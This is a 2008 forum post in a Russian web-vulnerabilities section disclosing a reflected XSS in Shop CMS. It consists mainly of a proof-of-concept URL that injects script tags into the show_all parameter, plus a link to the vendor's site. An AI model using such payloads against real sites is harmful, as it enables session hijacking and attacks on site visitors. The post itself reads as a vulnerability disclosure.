Xss в Shop Cms(пассивка)

Discussion in 'Веб-уязвимости' started by BlackCats, 9 Jan 2008.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    Code:
    http://www.site.com/index.php?categoryID=4&show_all="><script>alert(no_alert')<
    /script><""><script>alert(99)</script>&sort=name&direction=ASC&user_login=1&enter=1
    оффициальный сайт:
    http://shopcms.ru/
    ксс в последней версии скрипта, толком не копал, просто во время проверки сайта нашёл.
     
    1 person likes this.